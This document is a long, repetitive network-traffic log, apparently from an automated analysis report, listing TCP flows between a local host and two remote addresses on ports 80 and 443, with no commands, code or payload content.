                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 95.217.202.210:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 95.217.202.210:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 185.235.137.223:80
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 185.235.137.223:80 -> 192.168.2.22:49166
